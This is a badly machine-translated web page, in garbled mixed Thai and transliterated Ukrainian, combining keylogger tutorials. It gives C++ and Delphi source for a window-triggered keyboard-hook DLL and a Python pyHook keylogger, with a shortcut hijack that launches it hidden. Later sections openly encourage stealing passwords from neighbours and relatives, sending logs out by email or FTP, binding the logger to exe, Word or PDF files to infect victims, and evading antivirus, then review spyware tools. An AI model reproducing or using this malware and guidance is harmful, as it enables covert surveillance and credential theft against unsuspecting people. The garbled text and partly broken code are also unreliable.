Pokrokove เขียน keylogger บน p.



ห้องปฏิบัติการความมั่นคงสารสนเทศ จามรี tse zrobleno

โกลอฟนา / เพิ่มประสิทธิภาพการทำงาน

เกี่ยวกับการเขียนแป้นพิมพ์ลัด
rozpovidalos แล้วมากกว่าหนึ่งครั้ง แต่กลิ่นเหม็นทั้งหมด
คิดถึงnedolіkผู้ยิ่งใหญ่คนหนึ่ง - ตามกฎแล้ว
ฉันต้องรู้มากกว่านี้
ข้อมูลและไม่เขียนทุกอย่างลงในล็อกไฟล์
สิ่งที่ koristuvach เขียนบนแป้นพิมพ์ - แทบจะไม่คุณ
คิดมาก
กดปุ่มเมื่อเล่นใน CS 😉

ฟังดูเคืองว่าสายลับอาจเป็นโจรได้
มาติดไว้ไม่เขิลเขียนทุกอย่างที่ลงบีม
ให้คุณ 🙂 Navit ชื่อโปรแกรมดังกล่าว
ปืนสอดแนมไม่หันลิ้น - tse mayzhe
ตัวแทนอิเล็กทรอนิกส์ 007 :-))) Shlyakhiv เพื่อ
ดังนั้นโปรแกรมจึงเขียนลงในบันทึกว่าต้องคลิกอะไร
เรามีวัสดุมากมาย ง่ายที่สุด -
ควบคุมหน้าต่างที่ใช้งานอยู่ tobto ในยากิ
ในขณะที่กดปุ่ม 🙂 ​​แยกที
ฉันคิดว่าคุณรู้ shpiguns ตามกฎแล้วเพิ่มขึ้น
ไอคอนไฟล์ DLL. Tse pov'yazano z tim,
scho สำหรับการเปลี่ยนแปลง
จำเป็นต้องสร้างกระบวนการใหม่และ
zruchne สำหรับสิ่งนี้ - vikoristovuvati dll-ku
เพื่อที่จะเปิดใช้งาน
คนตัดไม้เองก็ต้องใช้งาน
ช่วงเวลาที่จะคว้า DLL และถ้ามันทำงานอยู่
เปลี่ยนเป็นอย่างอื่น - หน่วยความจำ vivantage її z

มาดูฟังก์ชัน DLL ของ Visual . ของฉันกัน
ค ++ ความท้าทายสำหรับปริศนาเกี่ยวกับ dll ดำเนินไป
ฟังก์ชัน hINSTAGE=LoadLibrary("name.dll") จาก hINSTAGE -
จามรี bi descriptor zavantazhenoїในหน่วยความจำ DLL
name.dll เป็นชื่อของไลบรารี Shchob її vivantage,
หน้าที่หลักของ FreeLibrary (hINSTAGE);

ตอนนี้เกี่ยวกับสิ่งเหล่านั้นเราต้องการได้อย่างไร
โปรแกรม ตัวอย่างเช่น เรารู้ว่า koristuvach
อ่านจดหมายผ่านเว็บไซต์ www.mail.ru จากนั้นคุณสามารถ
ตอกตะปูตัวแทนในแบบที่คุณเอาชนะ
การโจมตีของกุญแจถ้า coristuvach เข้าสู่ cey
เว็บไซต์. (ตามรอยความทรงจำในอดีต
แป้นพิมพ์ dodatakh spigun vzagali ไม่
อาจเป็น pratsyuvati ตัวอย่างเช่นในแถวที่อยู่
Internet Explorer "a - ce เพื่อนำไปสู่" เหตุฉุกเฉิน
จบโปรแกรม" - คุณเห็นอะไรอีก
Windows hot_v :))) สำหรับวิธีการทั้งหมด
pidide และอ่านรหัสผ่านจากตัวเรียกเลขหมาย
- ในขณะที่คอริสตุวัชทนทุกข์จากความหวาดระแวงและความหวาดระแวง
เข้าสู่ระบบและผ่านด้วยตนเอง 🙂 หรืออื่น ๆ
cіkavodіznatisya scho vіnเขียนใน Outlook หรือ
ที่แผ่นจดบันทึก แกนของส่วนหนึ่งของรหัสที่ viconu
การเปลี่ยนส่วนหัวของ vicons ที่เราต้องการ

ฮินสเตจ ฮินสเตจ;

ในขณะที่(1)
{
// เริ่มการวนซ้ำ

int sl, ll;
ll=1;
sl=2;
//เปลี่ยนเป็น
ลิชิลนิก
ก.
แผนภูมิ;
HWND hw;
//สาธิตเป็นเรื่องง่าย
shlyakhom - สุ่มแถวทีละอักขระ:
เอาหัวของการแสดงออกไปแล้วพวกเราจะต้องการมันสำหรับพวกเรา
เคียงบ่าเคียงไหล่.

ในขณะที่ (ll != sl)
{

hw=GetForegroundWindow();
GetWindowText(hw,st,128); //อ่านได้

char stt="_ที่นี่เราเขียนส่วนหัวของที่จำเป็น
พวกเรา vikna_№1";

sl=strlen(stt);
ll=0;
ในขณะที่ (stt==st)
// เท่ากับ
ทีละอักขระ
//ทำงานในตำแหน่งนั้นดีกว่า จะเป็นอย่างไร
พลิกกลับซึ่งจำเป็นต้องเข้า
// เราอยู่ในแถวเหมือนเป็นส่วนหนึ่งในแถวถัดไปคุณสามารถ
zrobiti like // ตัวกรองกว้าง

{
จะ++;
}

ถ้า (ll==sl) ( //ชอบแถว
วิ่งไปจนสุดแถวที่ 1 -

หยุด; // ขัดจังหวะกระบวนการ
}
// และจนถึงตอนนี้ - ชอบ
จำเป็นต้องย้อนลักษณะที่ปรากฏของวิคอนจำนวนหนึ่ง

char stt="_ที่นี่เราเขียนส่วนหัวของที่จำเป็น
พวกเรา vikna_№2";
sl=strlen(stt);
ll=0;
ในขณะที่ (stt==st)
{
จะ++;
}

ถ้า (ll==sl) (
หยุด; // ขัดจังหวะกระบวนการ
}

คุณสามารถแทนที่การแก้ไขที่ตามมาได้
ให้ขนานกัน ถ้าคุณจัดตำแหน่งใน
หนึ่งรอบขององค์ประกอบในแถว แม้ว่าจะมีเพียงหนึ่ง
zbіglasya - จากนั้นเปิดใช้งาน DLL-spygun

hINSTAGE=LoadLibrary("key1.dll");

ตอนนี้เราต้องเขียนใหม่ทั้งชั่วโมง
จี้อยู่เสมอ

ในขณะที่ (ll==sl) //docs
แถวzbіgayutsya - หมุนบนmіstsі

{
hw=GetForegroundWindow();
GetWindowText(hw,st,128);
//อ่านได้
แอคทีฟมากขึ้นในครั้งเดียว

ll=0;
ในขณะที่ (stt==st)
{
จะ++;
}
}

ออกจากวงจรพูดถึงคนที่กระตือรือร้น
เปลี่ยนไปอย่างกะทันหันที่ได้รับ "spygun" vivantazhuemo
ห้องสมุดและวัฏจักรเริ่มต้นจาก cob - tobto
โปรแกรมจะตรวจสอบอีกครั้งว่า vipade อยู่คนเดียวหรือไม่
คุณต้องการวิคอน

FreeLibrary(hINSTAGE);

อย่างไรก็ตาม คำอธิบายของวิธีการข้างต้นสามารถ
nedolіki - จำเป็นต้องพิจารณาใหม่
จากรายการทั้งหมดของ vikon chi є need
ใช้งานอยู่ในขณะนี้ ทอม
คุณสามารถใช้อัลกอริทึมอื่นได้ - ห้ามแทนที่
หัวเรื่องโชว์แต่ตื่นตาตื่นใจราวกับอยู่ในรายการ
ดูองค์ประกอบประเภท EditBox "ก. ตามกฎแล้ว
รหัสผ่านเขียนด้วยตัวเองที่นั่น 🙂 สำหรับใครที่จะ
ประหลาดใจที่องค์ประกอบของ vikna - และ yakscho
ในหมู่พวกเขาєแก้ไข - เช่นเดียวกับ DLL

ถ่าน p2, p3; //มาซิวิ
สัญลักษณ์สำหรับส่วนหัวของหน้าต่าง

ข้าพเจ้าก็รู้ในวัฏจักรเช่นเดียวกัน โดยทบทวนวิกนาทั้งหมด:

ในขณะที่(p3 !="แก้ไข") //docs
ไม่รู้เกี่ยวกับกล่องแก้ไข - vikonuemo cycle

{

hw=GetForegroundWindow();

HWND hwnd_child; // เปลี่ยน
องค์ประกอบ vikna

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child, p3, 128);
ถ้า (p3!="แก้ไข")
//เป็นคนแรก
องค์ประกอบที่รู้จักในหน้าต่าง - ไม่ใช่ EditBox - เหมือนกัน
ตลกไปไกล

{
ในขณะที่ (hwnd_child != 0)
{
hwnd_child = GetWindow (hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child, p3, 128);
ถ้า (p3=="แก้ไข")
{
หยุด;
}
}
}
}

ตอนนี้ vlasne เกี่ยวกับ shpigunsku DLL
เขียน її ให้สวยงามยิ่งขึ้นที่ Delphi, bo cey
ช่องว่างภายในของผู้ชายของ Pascal ไม่สามารถ
เสียง "สิปิศานอย"
prichipki เป็นชนิดข้อมูล Shchob สร้าง
เลือกไลบรารี File-New-Direct Link - i
การเตรียมการสำหรับ DLL พร้อมแล้ว และแกนเองก็เป็นรหัส:

ห้องสมุด key1;
ใช้ Windows;

var
KHook: ฮุก; //เปลี่ยนเป็น
"พาสต้า"

ฟังก์ชัน KProc (รหัส: จำนวนเต็ม; wParam: Word; lParam: LongInt): LongInt; stdcall;
คอนสต
KState: จำนวนเต็ม = 1073741824; //รหัส
“กดแป้น”

var
Simv: ชอร์ตสตริง;
KL: อาร์เรย์ของ Char; //สำหรับ
การแก้ไขรูปแบบแป้นพิมพ์

โครงสร้าง: TOFSTRUCT;
F: TextFile;
// เปลี่ยน
ล็อกไฟล์

เริ่ม

// เข้าสู่ระบบ
เตือนความจำ
ถ้า (lParam และ KState)<>0 แล้ว
เริ่ม

ทางออก;
จบ;

AssignFile(F, "keylog.txt");

// เราจะทำ vodcrity
ไฟล์ "keylog.txt":
ถ้า OpenFile(PCar("keylog.txt"), FSstruct, OF_EXIST) = HFILE_ERROR แล้ว
เริ่ม
เขียนซ้ำ (F);
// ไฟล์ใดไม่ใช่
สร้าง - เราสร้าง

จบ
อื่นๆ ผนวก (F);
//yakscho є - เขียนใน
จบ.

Simv:=chr(0); // nullable
เปลี่ยนอักขระที่อ่านจากแป้นพิมพ์

// แยกรหัส
กดปุ่ม
กรณี wParam ของ
// ตัวเลข
48..57: Simv :=Chr(wParam);
96: Simv:="0";
97: Simv:="1";
...
104:simv:="8";
105: Simv:="9";
189.109: Simv:="-";
110: Simv:="";
111: Simv:="/";
จบ;

GetKeyboardLayoutName(KL); //
ตรวจสอบเค้าโครงอีกครั้ง

yaksho KL = "00000409" แล้ว // ยักโช
ละติน:

เริ่ม
กรณี wParam ของ
219: Simv:="[";
221: Simv:="]";
186: Simv:=";";
222: Simv:=""";
188: Simv:=",";
190: Simv:="";
191: Simv:="/";
65..90: Simv :=Chr(wParam);
จบ;
จบ;
จบ;
yaksho KL = "00000419" แล้ว
// ยักโช
รัสเซีย

เริ่ม
กรณี wParam ของ
219: Simv:="X";
221: Simv:="b";
186: Simv: = "F";
222: Simv:="E";
188: Simv:="B";
190: Simv: = "ยู";
191: Simv:="";
65: Simv:="F";
...
87: Simv:="C";
88: Simv:="H";
89: Simv:="H";
90: Simv: = "ฉัน";
จบ;

// อักขระนี้ไม่ว่างเปล่า (ดังนั้น
เมื่อกดปุ่มตัวเลขและตัวอักษร)
// จากนั้นเราก็เขียนไฟล์โยคะ
ถ้า Simv<>"" แล้ว
เขียน (F, Simv);
//ปิดไฟล์
ปิดไฟล์(F);

// ส่งการแจ้งเตือน
พาสต้าอื่นๆ ในระบบ
ผลลัพธ์:=CallNextHookEx(KHook, รหัส, wParam, lParam);
จบ;

เริ่ม
//แทรกแปะ
เรามาพูดถึงคีย์บอร์ดกันดีกว่า

KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

คุณสามารถถามโปรแกรมนี้ใน
ที่รกร้างอยู่ในขอบเขตของ zastosuvannya - yakscho
ยอมรับได้เพียงพระราหุวตีเพียงครั้งเดียว
รหัสผ่านจากตัวเรียกเลขหมาย - คุณสามารถตั้งค่าเหมือนกัน
perevirku บนvіknaตามความต้องการของเราและถ้ามันจะไม่
กระตือรือร้น - เข้าครอบครองห้องสมุด
key1.dll รับชั่วโมงแรกสำหรับ
จามรี koristuvach vstigne เติมสัญลักษณ์ qi บน
คีย์บอร์ด แล้วทำให้ห้องสมุดมีชีวิตชีวาขึ้น
จบโปรแกรม ประมาณนั้น 🙂

hINSTAGE=LoadLibrary("key1.dll");
สลีป(10000);
// Chekati 10 วินาทีต่อ tse
koristuvach ชั่วโมงหมุนรหัสผ่าน
//ชั่วโมงอาจจะรกมากขึ้น
ประเภทของขั้นตอนการชุบกัลวาไนซ์ของคอริสทูวาช
// ความเร็วของโยคะบนคีย์บอร์ดนั้น 🙂

FreeLibrary(hINSTAGE);

PS: ให้วัสดุปรับผิวใหม่ทั้งหมด
รวมถึงการสาธิต
เป้าหมายการส่องสว่างอันศักดิ์สิทธิ์การตั้งค่าของผู้เขียน
แสดงให้เห็นต่อหน้าคุณ
โปรแกรมหุ่นยนต์อัลกอริธึมประเภท "อัพเกรด
แป้นหมุนคีย์บอร์ด" และทั้งหมด
รางวัลชนะเลิศ
วัสดุตกอยู่กับคุณ (ครอบงำ
ตัวดึง 🙂) รหัสการใช้งาน has
ความไม่ถูกต้องอื่น ๆ
อัลกอริทึม - พยายามรู้ด้วยตัวเอง))

PSS: แน่นอนว่าคีย์ล็อกเกอร์อาจไม่ใช่
เอาชนะหน้าที่หลักของคุณ -
มันจะดีกว่าที่จะเขียนบันทึกการโจมตีของปุ่ม, ale th
เปลี่ยนค่าของปุ่มที่กดเป็นของคุณ
เพลิดเพลิน - ale yak tse robiti i for what
บางทีแค่ชีวิตก็จำเป็น -
ถึงเวลา 🙂

สวัสดี ฉันกำลังเรียกคุณว่า QUAZAR วันนี้ผมจะแสดงวิธีสร้างคีย์ล็อกเกอร์อย่างง่ายใน Python Zrozumіlo, spygun คีย์บอร์ด tsey ไม่สามารถแกว่งไกวกับยักษ์ใหญ่เช่นนั้นได้ แต่โดยไม่คำนึงถึงทุกสิ่งที่คุณสามารถรู้จัก zastosuvannya ของคุณ

คีย์ล็อกเกอร์คืออะไร?

คุณสามารถอ่านรายงานเกี่ยวกับคีย์ล็อกเกอร์ดังกล่าวและเกี่ยวกับการดูคีย์ล็อกเกอร์ได้ในบทความ "" หากต้องการค้นหาเนื้อหาเพิ่มเติมในหัวข้อ ให้ค้นหาในไซต์ซึ่งอยู่ที่มุมขวาบน เพียงป้อนคำว่า keylogger หรือตัวกดแป้นพิมพ์

Keylogger อย่างง่ายใน Python

ในการสร้างคีย์ล็อกเกอร์ เราต้องการ:

  • ระบบปฏิบัติการ: Windows หรือ MacOs
  • การติดตั้งบนเครื่อง Python ทั้งหมด เช่นเดียวกับไลบรารีพิเศษ

เนื้อหานี้เป็นข้อมูลในลักษณะ Vikladena ที่ข้อมูลสถิติจะได้รับเฉพาะด้วยวิธีความรู้เท่านั้น ทั้งกองบรรณาธิการของเว็บไซต์ www.site หรือผู้เขียนสิ่งพิมพ์ไม่ต้องรับผิดชอบต่อความผิดพลาดใด ๆ หัวหน้าบทความเป็นผู้เขียนบทความ

การสร้างคีย์ล็อกเกอร์อย่างง่ายใน Python

ในการเริ่มต้น คุณต้องติดตั้ง Python


Keylogger อย่างง่ายใน Python

หลังจากติดตั้ง Python แล้ว คุณต้องติดตั้งโมดูล "pyHook" และ "pywin32" ในไซต์นี้ คุณจะพบเวอร์ชัน 32 บิตและ 64 บิตสำหรับ Windows และระบบปฏิบัติการอื่นๆ อัปเกรด PYhook และ pyWin32 เป็นเวอร์ชันของ Python และ Windows ที่คุณติดตั้ง (32 บิตหรือ 64 บิต)


Keylogger ใน Python โมดูล PYhook Keylogger ใน Python โมดูล pyWin32

เมื่อต้องการติดตั้ง ให้เปิดเมนู IDLE (Python GUI) จากเมนูเริ่ม

Keylogger อย่างง่ายใน Python

ไปที่เมนู "ไฟล์" และคลิกที่รายการ "ไฟล์ใหม่" จากนั้นวางรหัส keylogger:

#ชื่อ: QUAZAR
#เว็บไซต์: www.website
นำเข้า pyHook, pythoncom, sys, การบันทึก
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent (เหตุการณ์):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(เหตุการณ์.ascii)
logging.log(10,chr(เหตุการณ์.ascii))
กลับ True
hooks_manager = pyHook.HookManager ()
hooks_manager.KeyDown=OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

ประหยัดเงินด้วยการตั้งชื่อไฟล์ Keylogger.pyw อย่าบันทึกไฟล์จากไดเร็กทอรีราก C: สำหรับการคัดลอกไฟล์นั้น คุณต้องมีสิทธิ์ของผู้ดูแลระบบ สร้างโฟลเดอร์ใหม่บนไดรฟ์ C ไม่เช่นนั้น คุณไม่จำเป็นต้องมีสิทธิ์ของผู้ดูแลระบบในการคัดลอกไฟล์และบันทึก Keylogger.pyw ไว้ในตำแหน่งอื่น

วิธีเอาท์พุตไฟล์ชื่อ "file_log =" C: keyloggerlog.txt " คุณสามารถเลือกได้ว่าจะให้เป็นสถานที่หรือสวยงามกว่านี้ ถ้ามันแนบมากับฮาร์ดดิสก์ จากแอปพลิเคชันใดฉันจะบันทึกไฟล์zvіtuไปยังดิสก์ในไดเรกทอรีราก C:. Aje ฉันไม่มีอะไรจะคว้า

เปิดใช้คีย์ล็อกเกอร์โดยอัตโนมัติใน Python

Keylogger พร้อมแล้ว ตอนนี้ คุณต้องทำงานในลักษณะที่เปิดใช้งานคีย์ล็อกเกอร์โดยอัตโนมัติจากการตั้งค่า Windows คุณสามารถใช้มันแตกต่างกัน ลองใช้ zrobiti เพื่อขอความช่วยเหลือในไฟล์ bat เชื่อมโยงการเปิดคีย์ล็อกเกอร์กับโปรแกรมใดๆ หรือโดยการลงทะเบียนในการป้อนอัตโนมัติ

ฉันจะสร้างไฟล์ bat คัดลอกและวางรหัสต่อไปนี้ลงในแผ่นจดบันทึก:

::ชื่อ: QUAZAR
::เว็บไซต์: www.website
@echo ปิด
เริ่ม "" "C:keyloggerkeylogger.pyw"
เริ่ม "" "C: Program FilesOperalauncher.exe"

ในแถวแรก คุณต้องป้อนเส้นทางไปยังไฟล์ keylogger.pyw (ในกรณีของฉัน "C: keylogger.pyw") ในแถวอื่นคุณต้องรับผิดชอบในการเข้าสู่เส้นทางไปยังโปรแกรม เรียก vikoristova koristuvach (สำหรับความคิดของฉัน - เบราว์เซอร์ Opera)

หลังจากแก้ไขแล้ว ให้บันทึกไฟล์ในนามสกุล .bat (ในการเข้าสู่ระบบ logger.bat ของฉัน) ในตำแหน่งที่แนบมาบนคอมพิวเตอร์ (ในการเข้าสู่ระบบของฉันใน "C:keylogger.bat")

ไปที่รูปแบบการทำงานและเลือกทางลัดสำหรับโปรแกรมที่ใช้บ่อย (เบราว์เซอร์ของฉันคือ Opera) เราคลิกขวาที่หมีแล้วคลิกที่เมนูบริบทและไปที่สิทธิ์ของทางลัด ในฟิลด์ Object ให้ป้อนพาธไปยังไฟล์ keylogger bat C:keylogger.bat

หลังจากทำการเปลี่ยนแปลงแล้ว ไอคอนทางลัดก็จะเปลี่ยนไปด้วย อเล็กซ์เป็นเรื่องง่ายที่จะตำหนิผู้มีส่วนทำให้เกิดอำนาจ (ประหลาดใจที่หน้าจอ)

พวกเราคนไหนที่ไม่ต้องการคิดว่าตัวเองเป็นแฮ็กเกอร์ที่ยอดเยี่ยมและ zlamati อย่างน้อยหนึ่งครั้ง? :) ถ้าคุณต้องการทราบและไม่เกี่ยวกับสิ่งเหล่านั้นถ้าเป็นการดีที่จะใช้รหัสผ่านจากโพสต์ / โซเชียล เพื่อน merezhi, ทีม / คน, susіdaในkіmnatiคิดว่าฉันต้องการหนังครั้งเดียว :) ที่ต้องแก้ไข zreshtoyu! การโจมตีจำนวนมาก (การโจมตีที่เป็นอันตราย) เกี่ยวข้องกับการติดไวรัสคอมพิวเตอร์ของเหยื่อด้วยคีย์ล็อกเกอร์ (สปายแวร์)

ต่อไปในบทความของวันนี้เราจะพูดถึงผู้ที่ โปรแกรมbezkoshtovnіสำหรับการเรียนที่คอมพิวเตอร์โดยใช้ windows, de mozhna zavantazhit їхเวอร์ชันใหม่เช่นการแพร่ระบาดในคอมพิวเตอร์ของเหยื่อด้วยพวกเขาและเหตุใดจึงมีความเฉพาะเจาะจงของตัวแปร

เอลหันหลังกลับมีความแออัดเล็กน้อย

คุณต้องการคีย์ล็อกเกอร์เพื่ออะไร

ส่วนพวกที่เป็นแบบนั้น ฉันเดา คุณเดาเอาเอง ตามกฎแล้ว กลิ่นเหม็นก็เหมือนโปรแกรมที่ติดมา (หากคุณไม่ต้องการทำเช่นนี้) ให้ติดตั้งบนคอมพิวเตอร์ของเหยื่อ หลังจากนั้นจะแก้ไขทุกอย่างบนแป้นพิมพ์บนโหนดนี้ ด้วยอาชญากรรมนี้เองตามแรงกดดันของคุณเองเสียงจะคงที่: วันที่ชั่วโมงของการโจมตี (dії) โปรแกรมนั้นซึ่งในกรณีนี้คุณจะvikonanі (เบราว์เซอร์รวมถึงที่อยู่ของเว็บไซต์ (ไชโย, vіrazu bachimo, รหัสผ่าน chogo!); ภาคผนวกในเครื่อง บริการsystemnі (รวมถึงรหัสผ่านสำหรับเข้าสู่ระบบ windows ฯลฯ )

คุณสามารถเห็นปัญหาได้อย่างชัดเจน: ฉันใช้เวลาสองสามนาทีในการเข้าถึงคอมพิวเตอร์ของ suidka ของฉันและฉันต้องการใช้รหัสผ่านจาก VK! ด้วยการติดตั้งโปรแกรมมิราเคิลและเปิดเครื่องคอมพิวเตอร์ ฉันจะดูรหัสผ่านได้อย่างไร รู้วิธีเอาคอมพิวเตอร์ไปจากเธอไหม? Є ยอมรับความแปลกใหม่: ตามกฎแล้ว คีย์ล็อกเกอร์ส่วนใหญ่ตอนนี้มีแนวโน้มที่จะบันทึกฐานที่สะสมไว้ทั้งหมดภายในเครื่อง แต่ยังไม่สามารถปิดผนึกได้ไกลออกไป ตัวเลือกสำหรับการจัดการบันทึกจะไม่ระบุตัวตนโดยพื้นฐานแล้ว:

  • อีเมลถาวร (อาจเป็น kilka) - ตัวเลือกที่ดีที่สุด
  • เซิร์ฟเวอร์ FTP (ที่มี VIN є);
  • เซิร์ฟเวอร์ SMB
  • แฟลชไดรฟ์ได้รับการแก้ไขแล้ว (ใส่ลงในพอร์ต USB ของคอมพิวเตอร์ของเหยื่อ และบันทึกทั้งหมดจะถูกคัดลอกโดยอัตโนมัติในโหมดล่องหน!)

ทุกอย่างจำเป็นหรือไม่? ฉันคิดว่าประเด็นนั้นชัดเจน อาชญากรรมที่เกิดจากการขโมยรหัสผ่านซ้ำๆ คีย์ล็อกเกอร์ที่บกพร่อง และการกล่าวสุนทรพจน์ของแผนกต้อนรับหลายครั้ง:

  • การบันทึกรายการที่งานของสังคม ผู้ส่งสาร merezhakh chi (เช่น Skype)
  • จับภาพหน้าจอ
  • พีเรียด / บันทึกข้อมูลจากเว็บแคม (ซึ่งอาจทำได้ยากกว่า)

จะแฮ็คคีย์ล็อกเกอร์ได้อย่างไร?

และอาหารก็ไม่ใช่เรื่องง่าย จำเป็นต้องเข้าใจว่าเพียงแค่รู้คีย์ล็อกเกอร์ที่ใช้งานได้ดีไม่เพียงพอ

ออตเช่ สิ่งที่จำเป็นสำหรับสปายแวร์หุ่นยนต์ที่ประสบความสำเร็จ:

  • ผู้ดูแลระบบเข้าถึงคอมพิวเตอร์ระยะไกล
    นอกจากนี้ยังไม่ใช่ obov'yazkovo การเข้าถึงทางกายภาพมาก คุณสามารถเข้าสู่ระบบผ่าน RDP (บริการเดสก์ท็อประยะไกล); ทีมงาน; AmmyAdmin เป็นต้น
    ตามกฎแล้วจากมุมมองนี้สถานที่ที่พับมากที่สุดจะถูกผูกไว้ อย่างไรก็ตาม ฉันเพิ่งเขียนบทความเกี่ยวกับวิธีการใช้สิทธิ์ของผู้ดูแลระบบใน Windows
  • อีเมล/ftp ที่ไม่ระบุชื่อ (ไม่เรียกเก็บเงินจากคุณสำหรับสิ่งนี้)
    เห็นได้ชัดว่าเนื่องจากคุณกำลังอ่าน Susidov Shura คุณสามารถข้ามย่อหน้านี้ได้อย่างกล้าหาญ เช่นเดียวกับที่คุณมี vipadku ราวกับว่าคุณมีคอมพิวเตอร์ของเหยื่ออยู่ในมือ (alya ค้นหารหัสผ่านของพี่ชาย / น้องสาว)
  • Vidsutnіstทำงานป้องกันไวรัส / ระบบภายในเพื่อปกป้อง Windows
    คีย์ล็อกเกอร์สาธารณะเพิ่มเติม (ดูด้านล่าง) และซอฟต์แวร์ต่อต้านไวรัสที่สำคัญกว่า (ไม่ว่าโปรแกรมบันทึกไวรัสควรเข้าไปในเคอร์เนลของระบบปฏิบัติการหรือไดรเวอร์ระบบ และโปรแกรมป้องกันไวรัสไม่สามารถตรวจจับได้อีกต่อไป แต่ก็ไม่สามารถทำลายได้ พวกเขาทำไม่ได้) โดยอาศัยอำนาจตามที่กล่าวมา ซอฟต์แวร์ป้องกันไวรัสจะถูกทำลายอย่างไร้ความปราณี โอเค แอนตี้ไวรัส ไม่ปลอดภัยสำหรับสปายแวร์ของเราที่จะกลายเป็นระบบเดียวกับ Windows Defender (ซึ่งปรากฏก่อนหน้านี้ใน Windows 7 ขึ้นไป) กลิ่นเหม็นสงสัยกิจกรรมของผู้ปฏิบัติงานบนคอมพิวเตอร์ คุณสามารถหาข้อมูลเกี่ยวกับผู้ที่ต้องการทราบเกี่ยวกับพวกเขาใน Google ได้อย่างง่ายดาย

แอ็กซิสอาจจะและทุกสิ่งที่จำเป็น คิดถึงความสำเร็จของคุณโดยขโมยรหัสผ่าน / แผ่นพับ / รูปภาพของคนอื่นที่คุณอาจถูกล่อลวงให้บุกรุก

คุณจะดาวน์โหลดสปายแวร์และ de їx ได้อย่างไร?

ต่อมาหลังจากมองย้อนกลับไปที่คีย์ล็อกเกอร์หลัก ฉันมีโอกาสชนะในการฝึกฝนทุกวันด้วยความช่วยเหลือจากการดาวน์โหลดเวอร์ชันล่าสุดฟรี (ดังนั้นตอนนี้ทุกเวอร์ชันจึงเหลืออยู่ (สำหรับผู้ที่รู้จักใบหน้าจริงๆ) และแล้วโดย ผู้ทดสอบและ vikiers)

0. หนู!

คะแนน (เต็ม 10) :

  • เอกสารแนบ: 10
  • ประสิทธิภาพ / การใช้งาน: 9
  • ฟังก์ชันการทำงาน: 8

Tse เป็นแค่ระเบิด ไม่ใช่คีย์ล็อกเกอร์! ที่เวิร์กสเตชัน นั่ง 15-20 KB เหตุใดจึงสงสัย: เนื่องจากการเขียนส่วนใหญ่ในแอสเซมเบลอร์ (โปรแกรมเมอร์รุ่นเก๋าร้องไห้) และการเขียนงานใหญ่โดยผู้ที่ชื่นชอบแฮ็กเกอร์

นอกจากนี้ แพ็คเกจนี้ยังมี FileConnector ซึ่งเป็นโปรแกรมขนาดเล็กที่ให้คุณติดคีย์ล็อกเกอร์กับโปรแกรมใดก็ได้ เป็นผลให้คุณจะยอมรับไฟล์ exe ใหม่ที่มีขนาดเท่ากันและใช้งานได้เหมือนกับโปรแกรมนั้นที่คุณติดกาวไว้! หลังจากเปิดตัวครั้งแรก คีย์ล็อกเกอร์ของคุณจะถูกตั้งค่าเป็นโหมดซ่อนตัวโดยอัตโนมัติจากด้านหลังพารามิเตอร์ที่คุณตั้งค่าเพื่อบังคับใช้บันทึก สะดวกใช่มั้ย?

โอกาสที่ยอดเยี่ยมสำหรับวิศวกรรมสังคม (นำไฟล์เกม/งานนำเสนอไปให้เพื่อนในแฟลชไดรฟ์ คุณเพียงแค่พิมพ์เอกสาร Word (เกี่ยวกับวิธีสร้าง exe-ik ที่เปิดใช้ไฟล์ word/excel เฉพาะในบทความถัดไปของคุณ) ) เปิดตัว ทุกอย่างดีและสวยงาม แต่เพื่อนติดเชื้ออย่างล่องหน!). มิฉะนั้น เพียงส่งไฟล์นี้ให้เพื่อนทางไปรษณีย์ (ดีกว่าส่งไปดาวน์โหลดเพื่อให้เซิร์ฟเวอร์เมลสามารถดาวน์โหลดและจัดการไฟล์ exe ได้) เห็นได้ชัดว่ามีความเสี่ยงของแอนติไวรัสระหว่างการติดตั้ง แต่ก็ยังอาจมีความจำเป็น (จากนั้นจะไม่เกิดขึ้นหลังการติดตั้ง)

อย่างไรก็ตาม สำหรับความช่วยเหลือจากอุปกรณ์อื่นๆ คุณสามารถติดชุดแจกจ่ายของการติดตั้งที่แนบมา (เช่นใน The Rat! และในคีย์ล็อกเกอร์ Elite) ไม่เพียงแต่กับไฟล์ exe (เช่นในกรณีของไฟล์ trochs สองสามไฟล์) ของ coristuvachs ที่นิ่งงัน, เหมือนกัน, พวกเขาเรียกความสงสัย), ale іด้วย word / Excel และ pdf-files ที่ยอดเยี่ยม! อยู่ใน pdf-ku ธรรมดาแล้ว คุณไม่สามารถคิดอะไรได้เลย แต่มันไม่มี! :) วิธีที่จะกลัวเป็นหัวข้อของบทความทั้งหมด โดยเฉพาะอย่างยิ่งzavzyatіสามารถเขียนโภชนาการให้ฉันผ่านรูปแบบของลิงค์ส่งคืน ;)

ซากาลอม เจ้าหนู! คุณสามารถอธิบายได้เป็นเวลานานและมาก กุฎีดีกว่าสำหรับฉันแกนถูกบดขยี้ มีการร้องขอให้ดาวน์โหลด

1. สุดยอดคีย์ล็อกเกอร์

คะแนน (เต็ม 10) :

  • เอกสารแนบ: 10
  • ประสิทธิภาพ / การใช้งาน: 9
  • ฟังก์ชันการทำงาน: 8

Mabut หนึ่งในคีย์ล็อกเกอร์ที่ดีที่สุดที่เคยสร้างมา ความเป็นไปได้สูงสุด 20 อย่างนอกเหนือจากชุดมาตรฐาน (ซ้อนทับส่วนเสริม / vicons / ไซต์ทั้งหมด) รวมถึงผู้ส่งสารที่เกินกำลัง รูปภาพจากเว็บแคมและ - มันสำคัญยิ่งกว่า! - เปลี่ยนรหัสผ่านของบริการ WinLogon พูดอีกอย่างก็คือ คุณสามารถเปลี่ยนรหัสผ่านสำหรับการเข้าสู่ระบบ Windows (รวมถึงชื่อโดเมนด้วย!) เป็นไปได้ที่จะเปิดตัวหุ่นยนต์ในระดับไดรเวอร์ระบบและเปิดตัวในขั้นตอนของการพัฒนาระบบปฏิบัติการ เพื่อความเฉพาะเจาะจง โปรแกรมนี้ไม่ปรากฏให้เห็นโดยสมบูรณ์สำหรับ Kaspersky และสำหรับซอฟต์แวร์ป้องกัน scrambler อื่นๆ ฉันรู้ ฉันไม่ได้สร้างคีย์ล็อกเกอร์แบบกำหนดเองที่สร้างขึ้นบนแท็กซี่

